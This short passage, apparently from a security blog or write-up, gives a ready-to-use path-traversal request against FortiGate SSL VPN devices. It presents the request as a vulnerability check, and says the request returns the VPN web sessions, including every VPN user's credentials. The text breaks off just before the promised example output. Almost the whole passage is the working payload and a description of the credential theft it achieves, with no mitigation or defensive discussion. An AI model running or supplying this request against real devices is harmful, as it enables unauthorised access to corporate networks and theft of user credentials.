To check if the Fortigate is vulnerable you can just have to append the following path to the fortigate url: /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession you will then receive the web-sessions of the FortiGate VPN including all the credentials of the VPN users. The following is an example of how these credentials are shown: